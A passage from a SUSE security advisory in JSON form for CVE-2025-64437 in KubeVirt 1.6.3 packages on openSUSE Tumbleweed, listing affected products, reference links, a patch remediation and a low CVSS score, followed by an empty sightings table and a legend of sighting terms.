"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-26T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.